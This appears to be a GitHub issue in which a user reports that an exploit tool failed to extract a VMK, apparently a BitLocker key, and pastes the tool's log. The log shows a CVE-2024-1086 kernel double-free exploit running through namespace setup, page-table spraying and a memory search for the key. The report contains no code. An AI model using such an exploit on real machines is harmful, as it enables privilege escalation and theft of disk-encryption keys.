Successfully obtained the relevant memory but did not get vmk #21

@YoyoCrafts

[+] Info: Exploiting CVE-2024-1086 and obtaining VMK...
[*] creating user namespace (CLONE_NEWUSER)...
[*] creating network namespace (CLONE_NEWNET)...
[*] setting up UID namespace...
[*] configuring localhost in namespace...
[*] setting up nftables...
[+] running normal privesc
[*] waiting for the calm before the storm...
[*] sending double free buffer packet...
[*] spraying 16000 pte's...
[*] checking 16000 sprayed pte's for overlap...
[+] confirmed double alloc PMD/PTE
[+] found possible VMK base: 0x804033e640 -> 000000000033e640
[+] VERSION MISMATCH! 262148
[+] found possible VMK base: 0x8040203000 -> 0000000000203000
[+] VMK-needle not found!
[-] failed to find correct VMK addr: trying to find new base...
[+] found possible VMK base: 0x8040203000 -> 0000000000403000
[+] VMK-needle not found!
